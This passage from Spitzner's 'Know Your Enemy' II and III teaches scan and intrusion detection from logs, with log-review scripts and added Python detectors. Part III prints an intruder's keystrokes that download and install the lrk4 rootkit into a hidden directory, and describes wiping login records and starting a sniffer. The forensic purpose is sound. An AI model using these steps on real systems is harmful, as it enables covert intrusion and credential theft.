for a single vulnerability. If your logs show most of your systems being connected to from the same remote system, on the same
port, this is most likely an exploit scan. Basically, the enemy has an exploit for a single vulnerability, and they are scanning your
network for it. When they find it, they exploit it. For most Linux systems, TCP Wrappers is installed by default, so we
would find most of these connections in /var/log/secure. For other flavors of Unix, we can log all inetd connections by
launching inetd with the "-t" flag, which logs to the daemon facility. A typical exploit scan would look something like the entries below. Here we have a
source scanning for the wu-ftpd vulnerability.
/var/log/secure
Apr 10 13:43:48 mozart in.ftpd[6613]: connect from 192.168.11.200
Apr 10 13:43:51 bach in.ftpd[6613]: connect from 192.168.11.200
Apr 10 13:43:54 hadyen in.ftpd[6613]: connect from 192.168.11.200
Apr 10 13:43:57 vivaldi in.ftpd[6613]: connect from 192.168.11.200
Apr 10 13:43:58 brahms in.ftpd[6613]: connect from 192.168.11.200
Here we see the source 192.168.11.200 scanning our network. Notice how the source sequentially scans each IP (this is
not always the case). This is the advantage of having a log server: you can more easily identify patterns in your network since
all the logs are combined. The repeated connections to port 21, ftp, indicate they were most likely looking for the wu-ftpd
exploit. We have just determined what the blackhat is looking for. Often, scans tend to come in phases. Someone will release
code for an imap exploit, and you will suddenly see a rush of imap scans in your logs. The next month you will be hit by ftp. An
excellent source for current exploits is http://www.cert.org/advisories/. Sometimes, tools will scan for a variety of exploits at
the same time, so you may see a single source connecting to several ports.
Keep in mind, if you are not logging the service, you will not know if you are scanned for it. For example, most rpc
connections are not logged. However, many services can simply be added to /etc/inetd.conf for logging with TCP Wrappers.
For example, you can add an entry in /etc/inetd.conf for NetBus. You can define TCP Wrappers to safely deny and log the
connections (see Intrusion Detection for more info on this).
What's the Tool?
Sometimes you can actually determine the tools being used to scan your network. Some of the more basic tools scan for a
specific exploit, such as ftp-scan.c. If only a single port or vulnerability is being probed on your network, they are most likely
using one of these "single mission" tools. However, there exist tools that probe for a variety of vulnerabilities or weaknesses,
the two most popular are sscan by jsbach and nmap by Fyodor. I've selected these two tools because they represent the two
"categories" of scanning tools. I highly recommend you run these tools against your own network, you may be surprised by the
results :)
sscan represents the "all purpose" Script Kiddie scanning tool, and it's probably one of the best ones out there. It quickly
probes a network for a variety of vulnerabilities (including cgi-bin). It is easily customizable, allowing you to add probes
for new exploits. You just give the tool a network and network mask, and it does the rest for you. However, the user
must be root to use it. The output is extremely easy to interpret (hence making it so popular): it gives a concise
summary of many vulnerable services. All you have to do is run sscan against a network, grep for the word "VULN" in
the output, and then run the "exploit du jour". Below is an example of sscan run against the system mozart
(172.17.6.30).
otto #./sscan -o 172.17.6.30
--------------------------<[ * report for host mozart *
<[ tcp port: 80 (http) ]> <[ tcp port: 23 (telnet) ]>
<[ tcp port: 143 (imap) ]> <[ tcp port: 110 (pop-3) ]>
<[ tcp port: 111 (sunrpc) ]> <[ tcp port: 79 (finger) ]>
<[ tcp port: 53 (domain) ]> <[ tcp port: 25 (smtp) ]>
<[ tcp port: 21 (ftp) ]>
--<[ *OS*: mozart: os detected: redhat linux 5.1
mozart: VULN: linux box vulnerable to named overflow.
-<[ *CGI*: 172.17.6.30: tried to redirect a /cgi-bin/phf request.
-<[ *FINGER*: mozart: root: account exists.
--<[ *VULN*: mozart: sendmail will 'expn' accounts for us
--<[ *VULN*: mozart: linux bind/iquery remote buffer overflow
--<[ *VULN*: mozart: linux mountd remote buffer overflow
---------------------------<[ * scan of mozart completed *
Nmap represents the "raw data" tool set. It doesn't tell you what vulnerabilities exist; rather, it tells you what ports are
open, and you determine the security impact. Nmap has quickly become the port scanner of choice, and with good reason.
It takes the best of a variety of port scanners and puts all their functionality into a single tool, including OS detection,
various packet assembly options, both UDP and TCP scanning, randomization, etc. However, you need networking
skills to use the tool and interpret the data. Below is an example of nmap run against the same system.
otto #nmap -sS -O 172.17.6.30
Starting nmap V. 2.08 by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/)
Interesting ports on mozart (172.17.6.30):
Port State Protocol Service
21 open tcp ftp
23 open tcp telnet
25 open tcp smtp
37 open tcp time
53 open tcp domain
70 open tcp gopher
79 open tcp finger
80 open tcp http
109 open tcp pop-2
110 open tcp pop-3
111 open tcp sunrpc
143 open tcp imap2
513 open tcp login
514 open tcp shell
635 open tcp unknown
2049 open tcp nfs
TCP Sequence Prediction: Class=truly random
Difficulty=9999999 (Good luck!)
Remote operating system guess: Linux 2.0.35-36
Nmap run completed -- 1 IP address (1 host up) scanned in 2 seconds
By reviewing your logs, you can determine which of these tools were used against you. To do this, you have to understand
how the tools work. First, an sscan will show up in your logs as follows (this is a default scan with no modifications to any config files):
/var/log/secure
Apr 14 19:18:56 mozart in.telnetd[11634]: connect from 192.168.11.200
Apr 14 19:18:56 mozart imapd[11635]: connect from 192.168.11.200
Apr 14 19:18:56 mozart in.fingerd[11637]: connect from 192.168.11.200
Apr 14 19:18:56 mozart ipop3d[11638]: connect from 192.168.11.200
Apr 14 19:18:56 mozart in.telnetd[11639]: connect from 192.168.11.200
Apr 14 19:18:56 mozart in.ftpd[11640]: connect from 192.168.11.200
Apr 14 19:19:03 mozart ipop3d[11642]: connect from 192.168.11.200
Apr 14 19:19:03 mozart imapd[11643]: connect from 192.168.11.200
Apr 14 19:19:04 mozart in.fingerd[11646]: connect from 192.168.11.200
Apr 14 19:19:05 mozart in.fingerd[11648]: connect from 192.168.11.200
/var/log/maillog
Apr 14 21:01:58 mozart imapd[11667]: command stream end of file, while reading line user=??? host=[192.168.11.200]
Apr 14 21:01:58 mozart ipop3d[11668]: No such file or directory while reading line user=??? host=[192.168.11.200]
Apr 14 21:02:05 mozart sendmail[11675]: NOQUEUE: [192.168.11.200]: expn root
/var/log/messages
Apr 14 21:03:09 mozart telnetd[11682]: ttloop: peer died: Invalid or incomplete multibyte or wide character
Apr 14 21:03:12 mozart ftpd[11688]: FTP session closed
sscan also scans for cgi-bin vulnerabilities. These probes will not be logged by syslogd; you will find them in access_log. I
decided to include them anyway for your edification :)
/var/log/httpd/access_log
192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/phf HTTP/1.0" 302 192
192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/Count.cgi HTTP/1.0" 404 170
192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/test-cgi HTTP/1.0" 404 169
192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/php.cgi HTTP/1.0" 404 168
192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/handler HTTP/1.0" 404 168
192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/webgais HTTP/1.0" 404 168
192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/websendmail HTTP/1.0" 404 172
192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/webdist.cgi HTTP/1.0" 404 172
192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/faxsurvey HTTP/1.0" 404 170
192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/htmlscript HTTP/1.0" 404 171
192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/pfdisplay.cgi HTTP/1.0" 404 174
192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/perl.exe HTTP/1.0" 404 169
192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/wwwboard.pl HTTP/1.0" 404 172
192.168.11.200 - - [14/Apr/1999:16:44:50 -0500] "GET /cgi-bin/ews/ews/architext_query.pl HTTP/1.0" 404 187
192.168.11.200 - - [14/Apr/1999:16:44:50 -0500] "GET /cgi-bin/jj HTTP/1.0" 404 163
Notice how a complete connection was made for all the ports (SYN, SYN-ACK, ACK) and then torn down. That is because
sscan is determining at the application layer what is going on. Not only does sscan want to know if your ftp port is open, but
what ftp daemon is running. The same can be said for imap, pop, etc. This can be seen in sniff traces using sniffit, a tool
commonly used to sniff passwords.
mozart $ cat 172.17.6.30.21-192.168.11.200.7238
220 mozart.example.net FTP server (Version wu-2.4.2-academ[BETA-17](1) Tue Jun 9 10:43:14 EDT 1998) ready.
As you see above, a complete connection was made to determine the version of wu-ftpd that was running. When you see the
complete connections in your logs, as shown above, you are most likely being scanned by an exploit tool. These tools are
making a complete connection to determine what you are running.
Nmap, like most port scanners, does not care what you are running, but whether you are running specific services. For this, nmap
has a powerful set of options, letting you determine what kind of connection to make, including SYN, FIN, Xmas, Null, etc.
For a detailed description of these options, check out http://www.insecure.org/nmap/nmap_doc.html. Because of these
options, your logs will differ based on the options selected by the remote user. A connection made with the -sT flag is a
complete connection, so the logs will look similar to sscan; however, by default nmap scans more ports.
/var/log/secure
Apr 14 21:20:50 mozart in.rlogind[11706]: connect from 192.168.11.200
Apr 14 21:20:51 mozart in.fingerd[11708]: connect from 192.168.11.200
Apr 14 21:20:51 mozart ipop2d[11709]: connect from 192.168.11.200
Apr 14 21:20:51 mozart in.rshd[11710]: connect from 192.168.11.200
Apr 14 21:20:51 mozart gn[11711]: connect from 192.168.11.200
Apr 14 21:20:51 mozart gn[11711]: error: cannot execute /usr/sbin/gn: No such file or directory
Apr 14 21:20:52 mozart in.timed[11712]: connect from 192.168.11.200
Apr 14 21:20:52 mozart imapd[11713]: connect from 192.168.11.200
Apr 14 21:20:52 mozart ipop3d[11714]: connect from 192.168.11.200
Apr 14 21:20:52 mozart in.telnetd[11715]: connect from 192.168.11.200
Apr 14 21:20:52 mozart in.ftpd[11716]: connect from 192.168.11.200
One thing to keep in mind is the -D (or decoy) option. This nmap option allows the user to spoof the source address. You
may see scans from 15 different sources at the same time, but only one of them is the real one. It is extremely difficult to
determine which of the 15 was the actual source. More often, users will select the -sS flag for port scanning. This is a
stealthier option, as only a SYN packet is sent. If the remote system responds, the connection is immediately torn down with a
RST. The logs from such a scan look as follows (NOTE: only the first five entries are included here).
/var/log/secure
Apr 14 21:25:08 mozart in.rshd[11717]: warning: can't get client address: Connection reset by peer
Apr 14 21:25:08 mozart in.rshd[11717]: connect from unknown
Apr 14 21:25:09 mozart in.timed[11718]: warning: can't get client address: Connection reset by peer
Apr 14 21:25:09 mozart in.timed[11718]: connect from unknown
Apr 14 21:25:09 mozart imapd[11719]: warning: can't get client address: Connection reset by peer
Apr 14 21:25:09 mozart imapd[11719]: connect from unknown
Apr 14 21:25:09 mozart ipop3d[11720]: warning: can't get client address: Connection reset by peer
Apr 14 21:25:09 mozart ipop3d[11720]: connect from unknown
Apr 14 21:25:09 mozart in.rlogind[11722]: warning: can't get client address: Connection reset by peer
Apr 14 21:25:09 mozart in.rlogind[11722]: connect from unknown
Notice all the errors in the connections. Since the SYN-ACK sequence is torn down before a complete connection can be
made, the daemon cannot determine the source system. The logs show that you have been scanned; unfortunately you do not
know by whom. What is even more alarming is that on most other systems (including newer kernels of Linux), none of these errors
would have been logged. To quote Fyodor: " ... based on all the 'connection reset by peer' messages. This is a Linux 2.0.XX
oddity -- virtually every other system (including the 2.2 and later 2.1 kernels) will show nothing. That bug (accept() returning
before completion of the 3-way handshake) was fixed."
Nmap includes other stealth options, such as -sF, -sX and -sN, where various flags are used. This is what the logs look like for
these scans:
/var/log/secure
Notice something here: no logs! Scary, huh? You just got scanned and didn't even know it. All three types of scans determined
the same results; however, you are able to fully log only the first type, -sT (full connection). To detect these stealth scans, you
will need to use a different logging application such as tcplogd, scanlogd, or ippl. Some commercial firewalls will also detect
and log all of these scans (I have confirmed this on Checkpoint Firewall-1).
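The Pattern Matching and What's the Tool? sections above describe three signatures a central log server makes visible: one source hitting the same daemon across many hosts (an exploit scan for one service), one source touching many daemons on one host within the same minute (a full-connect multi-vulnerability scanner such as sscan or nmap -sT), and the "can't get client address" / "connect from unknown" pairs a half-open SYN scan leaves on a Linux 2.0 box. This added example (not the author's script) implements those three checks over TCP Wrappers lines; the sample log is constructed from the article's own excerpts, and the thresholds are assumptions to tune for your network.

```python
import re
from collections import defaultdict

# Constructed sample: lines modelled on the article's /var/log/secure excerpts as
# they would appear on a central log server (several hosts, one file).
SAMPLE_LOG = """\
Apr 10 13:43:48 mozart in.ftpd[6613]: connect from 192.168.11.200
Apr 10 13:43:51 bach in.ftpd[6613]: connect from 192.168.11.200
Apr 10 13:43:54 hadyen in.ftpd[6613]: connect from 192.168.11.200
Apr 10 13:43:57 vivaldi in.ftpd[6613]: connect from 192.168.11.200
Apr 14 19:18:56 mozart in.telnetd[11634]: connect from 192.168.11.200
Apr 14 19:18:56 mozart imapd[11635]: connect from 192.168.11.200
Apr 14 19:18:56 mozart in.fingerd[11637]: connect from 192.168.11.200
Apr 14 19:18:56 mozart ipop3d[11638]: connect from 192.168.11.200
Apr 14 19:18:56 mozart in.ftpd[11640]: connect from 192.168.11.200
Apr 14 21:25:08 mozart in.rshd[11717]: warning: can't get client address: Connection reset by peer
Apr 14 21:25:08 mozart in.rshd[11717]: connect from unknown
Apr 14 21:25:09 mozart in.timed[11718]: warning: can't get client address: Connection reset by peer
Apr 14 21:25:09 mozart in.timed[11718]: connect from unknown
Apr 14 21:25:09 mozart imapd[11719]: warning: can't get client address: Connection reset by peer
Apr 14 21:25:09 mozart imapd[11719]: connect from unknown
Apr 15 08:00:00 bach in.ftpd[7001]: connect from 10.0.0.5
"""

# syslog prefix: "Mon DD HH:MM:SS host daemon[pid]: message"
LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) (?P<host>\S+) "
    r"(?P<daemon>[\w.-]+)\[(?P<pid>\d+)\]: (?P<msg>.*)$"
)
CONNECT_RE = re.compile(r"connect from (\S+)$")


def parse(text):
    """Return one dict per line that matches the TCP Wrappers syslog format."""
    return [m.groupdict() for m in map(LINE_RE.match, text.splitlines()) if m]


def find_sweeps(records, min_hosts=3):
    """One source -> same daemon on several hosts: an exploit scan for that
    single service (the article's wu-ftpd example). Threshold is an assumption."""
    hosts = defaultdict(set)
    for r in records:
        m = CONNECT_RE.match(r["msg"])
        if m and m.group(1) != "unknown":
            hosts[(m.group(1), r["daemon"])].add(r["host"])
    return {k: sorted(v) for k, v in hosts.items() if len(v) >= min_hosts}


def find_multi_service(records, min_daemons=4):
    """One source -> many different daemons on one host inside the same minute:
    a full-connect, multi-vulnerability scanner (sscan, nmap -sT)."""
    daemons = defaultdict(set)
    for r in records:
        m = CONNECT_RE.match(r["msg"])
        if m and m.group(1) != "unknown":
            minute = r["ts"][:-3]  # drop the seconds
            daemons[(m.group(1), r["host"], minute)].add(r["daemon"])
    return {k: sorted(v) for k, v in daemons.items() if len(v) >= min_daemons}


def find_half_open(records):
    """'can't get client address' followed by 'connect from unknown' for the same
    pid: the half-open (SYN) scan signature on Linux 2.0 hosts. The source is not
    recoverable from these entries, only the fact, time and services probed."""
    warned = set()
    hits = defaultdict(list)
    for r in records:
        key = (r["host"], r["pid"])
        if r["msg"].startswith("warning: can't get client address"):
            warned.add(key)
        elif r["msg"] == "connect from unknown" and key in warned:
            hits[r["host"]].append((r["ts"], r["daemon"]))
    return dict(hits)


def analyse(text):
    records = parse(text)
    return {
        "sweeps": find_sweeps(records),
        "multi_service": find_multi_service(records),
        "half_open": find_half_open(records),
    }


if __name__ == "__main__":
    for kind, found in analyse(SAMPLE_LOG).items():
        print(kind)
        for key, value in found.items():
            print("   ", key, "->", value)
```

Run it against a real /var/log/secure by replacing SAMPLE_LOG with the file contents; the 10.0.0.5 line is there to show that a single ordinary connection trips none of the checks.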
Did They Gain Access?
Once you have determined that you were scanned, and what they were looking for, the next big question is "Did they get in?".
Most of today's remote exploits are based on buffer overflows (otherwise known as smashing the stack). Simply stated, a
buffer overflow is when a program (usually a daemon) receives more input than it expected, thus overwriting critical areas in
memory. Certain code is then executed, usually giving the user root access. For more info on buffer overflows, check
Aleph1's excellent paper at ftp://ftp.technotronic.com/rfc/phrack49-14.txt.
You can normally identify buffer overflow attacks in the /var/log/messages log file (or /var/adm/messages for other flavors of
Unix) for attacks such as mountd. You will also see similar logs in maillog for such attacks against imapd. A buffer overflow
attack would look like this.
Apr 14 04:20:51 mozart mountd[6688]: Unauthorized access by NFS client 192.168.11.200.
Apr 14 04:20:51 mozart syslogd: Cannot glue message parts together
Apr 14 04:20:51 mozart mountd[6688]: Blocked attempt of 192.168.11.200 to mount
When you see something like this in your log files, someone has attempted to exploit your system. It is difficult to determine if
the exploit was successful. One way to do this is, following the exploit attempt, to see if there are any connections from the
remote source to your system. If they successfully log in from the remote system, they have access. Another clue is if you find
the accounts "moof", "rewt", "crak0", or "w0rm" added to your /etc/passwd file. These accounts, uid 0, are added by some of
the more common exploit scripts. Once a blackhat gains access, normally the first thing they do is wipe your logs clean and
trojan your logging (syslogd); for more information, see Know Your Enemy: III. From this point on, you will not receive any
logs from your system as everything has been compromised. What you do next is subject for another article :). Until then, I
recommend you check out http://www.cert.org/nav/recovering.html.
To help me find anomalies in my log files, I whipped up a shell script that scans my logs for me. For more detailed information
on grepping and sorting log files, check out this posting by Marcus Ranum.
Bourne shell script:
#!/bin/bash
#
# Created 20 April, 1999
# Lance Spitzner, lance@spitzner.net
#
# Shows last 10 entries of critical system logs.
# Build in some "artificial intelligence" using
# greps and sorts. You can select a specific
# hosts logs, or you can select all hosts logs.
#
# Add whatever grep/sort statements you want to the
# functions below. The ones included are just
# examples.

##### Build variables
# An empty pattern makes grep match every line, i.e. all hosts.
if [ "$1" = "all" ]; then
    system=""
else
    system=$1
fi
log=$2

##### Functions
secure () {
    echo -e "\n\t--- Last 10 entries in /var/log/secure ---\n"
    # 172.16.1. is the local network; its own connections are filtered out as noise.
    grep "$system" /var/log/secure | grep -v "172.16.1." | tail -10
}

messages () {
    echo -e "\n\t--- Last 10 entries in /var/log/messages ---\n"
    # Drop routine named chatter and syslog's periodic MARK lines.
    grep "$system" /var/log/messages | grep -E -v '(named|MARK)' | tail -10
}

maillog () {
    echo -e "\n\t--- Last 10 entries in /var/log/maillog ---\n"
    grep "$system" /var/log/maillog | tail -10
}

title () {
    if [ "$system" = "" ]; then
        echo -e "\n### These are the log results of all systems ###"
    else
        echo -e "\n### These are the log results of system $system ###"
    fi
}

##### Actual program
case "$log" in
    secure)
        title
        secure
        ;;
    messages)
        title
        messages
        ;;
    maillog)
        title
        maillog
        ;;
    all)
        title
        secure
        messages
        maillog
        ;;
    *)
        echo -e "\nUsage: $(basename "$0") <host> <log>"
        echo
        echo "    <host>"
        echo "    Can either be a single source you want to grep"
        echo "    for in the log, or type \"all\" for all hosts in the"
        echo "    log file."
        echo
        echo "    <log>"
        echo "    secure   -> for /var/log/secure"
        echo "    messages -> for /var/log/messages"
        echo "    maillog  -> for /var/log/maillog"
        echo -e "\tall      -> for all three log files\n"
        ;;
esac

exit 0
Korn shell script:
#!/bin/ksh
#
# Created 20 April, 1999
# Lance Spitzner, lance@spitzner.net
#
# Shows last 10 entries of critical system logs.
# Build in some "artificial intelligence" using
# greps and sorts. You can select a specific
# hosts logs, or you can select all hosts logs.
#

##### Define input
# Every syslog line contains a ":" in its timestamp, so grepping for ":"
# selects all hosts.
if [ "$1" = "all" ]; then
    system=":"
else
    system=$1
fi
log=$2

##### Define logs
inetdlog=/var/adm/inetdlog
messages=/var/adm/messages
syslog=/var/adm/syslog

##### Functions
inetdlog () {
    echo "\n\t--- Last 10 entries in $inetdlog ---\n"
    # 172.16.1. is the local network; its own connections are filtered out as noise.
    grep "$system" "$inetdlog" | grep -v "172.16.1." | tail -10
}

messages () {
    echo "\n\t--- Last 10 entries in $messages ---\n"
    # Drop routine named chatter and syslog's periodic MARK lines.
    grep "$system" "$messages" | egrep -v '(named|MARK)' | tail -10
}

syslog () {
    echo "\n\t--- Last 10 entries in $syslog ---\n"
    grep "$system" "$syslog" | tail -10
}

title () {
    if [ "$system" = ":" ]; then
        echo "\n### These are the log results of all systems ###"
    else
        echo "\n### These are the log results of system $system ###"
    fi
}

##### Actual program
case "$log" in
    inetdlog)
        title
        inetdlog
        ;;
    messages)
        title
        messages
        ;;
    syslog)
        title
        syslog
        ;;
    all)
        title
        inetdlog
        messages
        syslog
        ;;
    *)
        echo "\nUsage: `basename $0` <host> <log>"
        echo
        echo "\t<host>"
        echo "\tCan either be a single source you want to grep"
        echo "\tfor in the log, or type \"all\" for all hosts in the"
        echo "\tlog file."
        echo
        echo "\t<log>"
        echo "\tinetdlog -> for $inetdlog"
        echo "\tmessages -> for $messages"
        echo "\tsyslog   -> for $syslog"
        echo "\tall      -> for all three log files\n"
        ;;
esac

exit 0
Conclusion
Your system logs can tell you a great deal about the enemy. However, the first step is guaranteeing the integrity of your log
files. One of the best ways to do that is to use a remote log server that receives and stores logs from all systems. Once secured,
you can then identify patterns in your log files. Based on these patterns and log entries, you can determine what the blackhat is
looking for, and potentially what tools they are using. Based on this knowledge, you can better secure and protect your
systems.
Author's bio
Lance Spitzner enjoys learning by blowing up his Unix systems at home. Before this, he was an Officer in the Rapid
Deployment Force, where he blew up things of a different nature. You can reach him at lance@spitzner.net .
Part 3
They Gain Root
Know Your Enemy: III
Lance Spitzner
Last Modified: 23 May, 1999
This article is the third of a series focusing on the script kiddie. The first paper focuses on how script kiddies probe
for, identify, and exploit vulnerabilities. The second paper focuses on how you can detect these attempts, identify
what tools they are using and what vulnerabilities they are looking for. This paper, the third, focuses on what
happens once they gain root: specifically, how they cover their tracks and what they do next.
Who is the script kiddie
As we learned in the first paper, the script kiddie is not so much a person as it is a strategy, the strategy of probing for the easy
kill. The intruder is not searching for specific information or targeting a specific company; the goal is to gain root the easiest way
possible. Intruders do this by focusing on a small number of exploits, and then searching the entire Internet for systems open to
those exploits. Do not underestimate this strategy: sooner or later they find someone vulnerable.
Once they find a vulnerable system and gain root, their first step is normally to cover their tracks. They want to ensure you do
not know your system was hacked and cannot see nor log their actions. Following this, they often use your system to scan
other networks, or silently monitor your own. To gain a better understanding of how they accomplish these acts, we are going
to follow the steps of a system compromised by an intruder using script kiddie tactics. Our system, called mozart, is a Linux
box running Red Hat 5.1. The system was compromised on April 27, 1999. Below are the actual steps our intruder took,
with system logs and keystrokes to verify each step. All system logs were recorded to a protected syslog server, all
keystrokes were captured using sniffit. Throughout this paper our intruder is referred to as he; however, we have no idea what
the true gender of the intruder is.
The exploit
On 27 April, at 00:13 hours, our network was scanned by the system 1Cust174.tnt2.long-branch.nj.da.uu.net for several
vulnerabilities, including imap. Our intruder came in noisy, as every system in the network was probed (for more information on
detecting and analyzing scans, please see the second paper of this series).
Apr 27 00:12:25 mozart imapd[939]: connect from 208.252.226.174
Apr 27 00:12:27 bach imapd[1190]: connect from 208.252.226.174
Apr 27 00:12:30 vivaldi imapd[1225]: connect from 208.252.226.174
Apparently he found something he liked and returned at 06:52 and 16:47 the same day. He started off with a more thorough
scan, but this time focusing only on mozart. He identified a weakness and launched a successful attack against mountd, a
commonly known vulnerability for Red Hat 5.1. Here we see in /var/log/messages the intruder gaining root. The tool used
was most likely ADMmountd.c, or something similar to it.
Apr 27 16:47:28 mozart mountd[306]: Unauthorized access by NFS client 208.252.226.174.
Apr 27 16:47:28 mozart syslogd: Cannot glue message parts together
Apr 27 16:47:28 mozart mountd[306]: Blocked attempt of 208.252.226.174 to mount
~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P
~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~
Immediately following this exploit, we see in /var/log/messages our intruder gaining root by telnetting in as the user crak0, and
then using su to become the user rewt. Both of these accounts were added by the exploit script. Our intruder now has total control
of our system.
Apr 27 16:50:27 mozart login[1233]: FAILED LOGIN 2 FROM 1Cust102.tnt1.long-branch.nj.da.uu.net
FOR crak, User not known to the underlying authentication module
Apr 27 16:50:38 mozart PAM_pwdb[1233]: (login) session opened for user crak0 by (uid=0)
Apr 27 16:50:38 mozart login[1233]: LOGIN ON ttyp0 BY crak0 FROM
1Cust102.tnt1.long-branch.nj.da.uu.net
Apr 27 16:50:47 mozart PAM_pwdb[1247]: (su) session opened for user rewt by crak0(uid=0)
Covering their tracks
The intruder is now on our system as root. As we are now about to see, the next step for him is to make sure he does not get
caught. First, he checks to see if anyone else is on the system.
[crak0@mozart /tmp]$ w
  4:48pm  up 1 day, 18:27,  1 user,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU  WHAT
crak0    ttyp0    1Cust102.tnt1.lo  4:48pm   0.00s  0.23s  0.04s  w
After making sure the coast is clear, he will want to hide all of his actions. This normally entails removing any evidence from the
log files and replacing system binaries, such as ps or netstat, with trojaned versions so you cannot see the intruder on your own system.
Once the trojans are in place, the intruder has gained total control of your system and you will most likely never know it. Just as
there are automated scripts for hacking, there are also automated tools for hiding intruders, often called rootkits. One of the
more common rootkits is lrk4. By executing the script, a variety of critical files are replaced, hiding the intruder in seconds.
For more detailed information on rootkits, see the README that comes with lrk4. This will give you a better idea how
rootkits work in general.
Within minutes of compromising our system, we see the intruder downloading the rootkit and then implementing the script with
the command "make install". Below are the actual keystrokes the intruder typed to hide himself.
cd /dev/
su rewt
mkdir ". "
cd ". "
ftp technotronic.com
anonymous
fdfsfdsdfssd@aol.com
cd /unix/trojans
get lrk4.unshad.tar.gz
quit
ls
tar -zxvf lrk4.unshad.tar.gz
mv lrk4 proc
mv proc ". "
cd ". "
ls
make install
Notice the first thing that our intruder did: he created the hidden directory ". " (a dot followed by a space) to hide his toolkit.
This directory does not show up with the "ls" command, and with "ls -la" it looks like the "." entry for the current directory.
One way you can locate the directory is with the "find" command (be sure you can trust the integrity of your "find" binary).
mozart #find / -depth -name "*.*"
/var/lib/news/.news.daily
/var/spool/at/.SEQ
/dev/. /. /procps-1.01/proc/.depend
/dev/. /.
/dev/.
Our intruder may have been somewhat sophisticated in using trojan binaries, but had a simpler approach to cleaning the log
files. Instead of using cleaning tools such as zap2 or clean, he copied /dev/null over the files /var/run/utmp and /var/log/utmp,
while deleting /var/log/wtmp. You know something is wrong when these log files contain no data, or you get the following
error:
[root@mozart sbin]# last -10
last: /var/log/wtmp: No such file or directory
Perhaps this file was removed by the operator to prevent logging last info.
The next step
Once a system has been compromised, intruders tend to do one of two things. First, they use your system as a launching pad
and scan or exploit other systems. Second, they decide to lie low and see what they can learn about your system, such as
accounts for other systems. Our intruder chose option number two: lie low and see what he could learn. He
implemented a sniffer on our system that would capture all of our network traffic, including telnet and ftp sessions to other
systems. This way he could learn logins and passwords. We see the system going into promiscuous mode in /var/log/messages
soon after the compromise.
Apr 27 17:03:38 mozart kernel: eth0: Setting promiscuous mode.
Apr 27 17:03:43 mozart kernel: eth0: Setting promiscuous mode.
After implementing the trojan binaries, clearing the log files, and starting the sniffer, our intruder disconnected from the system.
However, we will see him returning the next day to find out what traffic he captured.
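The indicators this paper has shown so far (one source touching every host, the mountd attack with its run of 0x90 bytes, sessions opened for accounts you never created, the interface going promiscuous, and utmp/wtmp nulled or deleted) can be checked mechanically. The following is an added example, not part of Spitzner's paper: the log lines are a constructed sample modelled on the entries quoted above, and KNOWN_ACCOUNTS is an assumed list of the accounts you actually created.

```python
import os
import re
import tempfile
from collections import defaultdict

# Constructed sample, modelled on the /var/log/messages entries quoted in the
# paper (host names, PIDs and the source address are the page's; the "~P" run
# is syslog's caret notation for the 0x90 bytes of the mountd overflow).
SAMPLE_LOG = """\
Apr 27 00:12:25 mozart imapd[939]: connect from 208.252.226.174
Apr 27 00:12:27 bach imapd[1190]: connect from 208.252.226.174
Apr 27 00:12:30 vivaldi imapd[1225]: connect from 208.252.226.174
Apr 27 16:47:28 mozart mountd[306]: Unauthorized access by NFS client 208.252.226.174.
Apr 27 16:47:28 mozart mountd[306]: Blocked attempt of 208.252.226.174 to mount ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P
Apr 27 16:50:38 mozart PAM_pwdb[1233]: (login) session opened for user crak0 by (uid=0)
Apr 27 16:50:47 mozart PAM_pwdb[1247]: (su) session opened for user rewt by crak0(uid=0)
Apr 27 17:03:38 mozart kernel: eth0: Setting promiscuous mode.
Apr 27 18:00:01 mozart PAM_pwdb[1300]: (login) session opened for user lance by (uid=0)
"""

# Accounts you created yourself (assumed list); any other login is suspect.
KNOWN_ACCOUNTS = {"root", "lance"}

SYSLOG_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) (?P<host>\S+) "
    r"(?P<prog>[^:\[]+)(?:\[\d+\])?: (?P<msg>.*)$")
SESSION_RE = re.compile(r"\((?P<svc>login|su)\) session opened for user (?P<user>\S+)")
IP_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")
# eight or more repeated 0x90 bytes, either raw or in caret notation
SLED_RE = re.compile(r"(?:~P){8,}|[\x80-\xff]{8,}")


def analyse(lines, known_accounts=KNOWN_ACCOUNTS, scan_threshold=3):
    """Return (severity, host, description) findings for the indicators the
    paper walks through: one source connecting to many hosts, mountd attack
    traffic, sessions for unknown accounts, and an interface going promiscuous."""
    findings = []
    hosts_per_source = defaultdict(set)
    for line in lines:
        m = SYSLOG_RE.match(line)
        if not m:
            continue
        host, prog, msg = m["host"], m["prog"], m["msg"]
        ip = IP_RE.search(msg)
        src = ip.group(1) if ip else "unknown"
        if "connect from" in msg:                      # tcp_wrappers / inetd connection log
            hosts_per_source[src].add(host)
        if prog == "mountd" and ("Unauthorized access" in msg or "Blocked attempt" in msg):
            if SLED_RE.search(msg):
                findings.append(("high", host, f"mountd overflow attempt (NOP-like sled) from {src}"))
            else:
                findings.append(("medium", host, f"mountd rejected NFS client {src}"))
        sm = SESSION_RE.search(msg)
        if sm and sm["user"] not in known_accounts:
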